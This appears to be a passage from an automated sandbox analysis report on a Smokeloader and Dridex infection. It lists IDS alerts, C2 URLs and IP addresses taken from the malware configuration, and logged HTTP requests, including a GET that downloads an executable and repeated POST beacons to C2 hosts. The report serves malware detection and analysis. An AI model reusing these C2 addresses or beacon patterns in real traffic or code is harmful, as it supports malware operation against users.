                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49721 -> 116.58.10.60:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49711 -> 116.58.10.60:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49723 -> 116.58.10.60:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49756 -> 190.98.23.157:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49753 -> 116.58.10.60:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49719 -> 116.58.10.60:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49718 -> 116.58.10.60:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49727 -> 116.58.10.60:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49720 -> 116.58.10.60:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49740 -> 116.58.10.60:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49717 -> 116.58.10.60:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49732 -> 116.58.10.60:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49725 -> 116.58.10.60:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49752 -> 116.58.10.60:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49739 -> 116.58.10.60:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49737 -> 116.58.10.60:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49713 -> 116.58.10.60:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49722 -> 116.58.10.60:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49712 -> 116.58.10.60:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49714 -> 116.58.10.60:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49754 -> 116.58.10.60:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49729 -> 116.58.10.60:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49738 -> 116.58.10.60:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49735 -> 116.58.10.60:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49733 -> 116.58.10.60:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49730 -> 116.58.10.60:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49728 -> 116.58.10.60:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49758 -> 190.98.23.157:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49736 -> 116.58.10.60:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49715 -> 116.58.10.60:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49760 -> 190.98.23.157:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49716 -> 116.58.10.60:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49724 -> 116.58.10.60:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49726 -> 116.58.10.60:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49749 -> 23.145.40.162:443
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49747 -> 23.145.40.162:443
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49750 -> 23.145.40.162:443
                Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:49747 -> 23.145.40.162:443
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49746 -> 23.145.40.162:443
                Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:49746 -> 23.145.40.162:443
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49741 -> 23.145.40.162:443
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49743 -> 23.145.40.162:443
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49742 -> 23.145.40.162:443
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49748 -> 23.145.40.162:443
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49744 -> 23.145.40.162:443
                Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:49743 -> 23.145.40.162:443
                Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:49748 -> 23.145.40.162:443
                Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:49750 -> 23.145.40.162:443
                Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:49749 -> 23.145.40.162:443
                Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:49741 -> 23.145.40.162:443
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49751 -> 23.145.40.162:443
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49755 -> 23.145.40.162:443
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49761 -> 23.145.40.162:443
                Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:49742 -> 23.145.40.162:443
                Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:49744 -> 23.145.40.162:443
                Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:49751 -> 23.145.40.162:443
                Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:49755 -> 23.145.40.162:443
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49757 -> 23.145.40.162:443
                Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:49761 -> 23.145.40.162:443
                Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:49757 -> 23.145.40.162:443
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49759 -> 23.145.40.162:443
                Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:49759 -> 23.145.40.162:443
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49745 -> 23.145.40.162:443
                Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:49745 -> 23.145.40.162:443
                System process connects to network (likely due to code injection or exploit)
                Source: C:\Windows\explorer.exeNetwork Connect: 116.58.10.60 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 190.98.23.157 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 23.145.40.164 443Jump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 23.145.40.162 443Jump to behavior
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://nwgrus.ru/tmp/index.php
                Source: Malware configuration extractorURLs: http://tech-servers.in.net/tmp/index.php
                Source: Malware configuration extractorURLs: http://unicea.ws/tmp/index.php
                Source: Joe Sandbox ViewIP Address: 23.145.40.164 23.145.40.164
                Source: Joe Sandbox ViewIP Address: 23.145.40.162 23.145.40.162
                Source: Joe Sandbox ViewASN Name: NEXLINX-AS-APAutonomousSystemNumberforNexlinxPK NEXLINX-AS-APAutonomousSystemNumberforNexlinxPK
                Source: Joe Sandbox ViewASN Name: TelecommunicationcompanySuriname-TeleSurSR TelecommunicationcompanySuriname-TeleSurSR
                Source: Joe Sandbox ViewASN Name: SURFAIRWIRELESS-IN-01US SURFAIRWIRELESS-IN-01US
                Source: Joe Sandbox ViewASN Name: SURFAIRWIRELESS-IN-01US SURFAIRWIRELESS-IN-01US
                Source: Joe Sandbox ViewJA3 fingerprint: 72a589da586844d7f0818ce684948eea
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2829848 - Severity 2 - ETPRO MALWARE SmokeLoader encrypted module (3) : 23.145.40.162:443 -> 192.168.2.5:49741
                Source: global trafficHTTP traffic detected: GET /ksa9104.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.164
                Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://nmesrodehsvre.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 181Host: calvinandhalls.com
                Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://ircvpemvdgiy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 311Host: calvinandhalls.com
                Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://yqvikokvyrwyspvc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 171Host: calvinandhalls.com
                Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://kersnljeyirt.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 350Host: calvinandhalls.com
                Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://udbfyhiovnpjdsu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 223Host: calvinandhalls.com
                Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://gmhyvptkkbkcth.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 288Host: calvinandhalls.com
                Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://kgiatertamgp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 321Host: calvinandhalls.com
                Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://oclbjgwufaxiagdw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 185Host: calvinandhalls.com
                Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://itcikyawgmc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 299Host: calvinandhalls.com
                Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://nphwxmrpgxfb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 354Host: calvinandhalls.com
                Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://calvinandhalls.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 501Host: calvinandhalls.com
                Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://ygokuufxqffgxycc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: calvinandhalls.com
                Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://exeynemntnpasq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: calvinandhalls.com
                Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://rakvoqbrycri.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: calvinandhalls.com
                Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://yjslvmtqvthxoxo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: calvinandhalls.com
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bdxvqfpjlsvhpaof.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 121Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uotbaartbcqldrdx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 328Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kdulrgfaviysx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 141Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jlkucuylyof.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 278Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ejvnhlvhpussik.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 368Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vsagqcxnudryn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 196Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fogsqjysaystoh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 359Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://verasvafreecifd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 220Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://eaxyrbajkqo.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 304Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dfqwnqnvxbwcwpps.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 272Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ovvofxjtrlcblbe.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 174Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://khaxmqmrelincl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 201Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tuivtdfccoxjstqv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 184Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ktflshoikbglbj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 136Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xapousftkgr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 198Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xhvcwlrrfnr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 279Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://edyhjfoqqme.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 200Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ecpbasxejvhmni.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 173Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pklhudfcrpsm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 303Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bwdwojspdgtrj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 166Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://otxnyveihviep.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 257Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://btdksbvigeadnr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 160Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xwykiojnclenqqi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 116Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nhtxkrllcfsfts.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 275Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xdbwevihetlvramf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 237Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kktprwryymhwgw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 363Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://waytjuqjooe.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 320Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://seyshogepyribe.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 177Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jjfnbkmpvhxjsu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 269Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://btusdqnvtphf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 344Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://utinkaubisghnyye.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 154Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jkjogobunqlid.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 114Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ohoqxgflpcpf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 297Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rcdwkbgyoixtxr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 261Host: nwgrus.ru
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
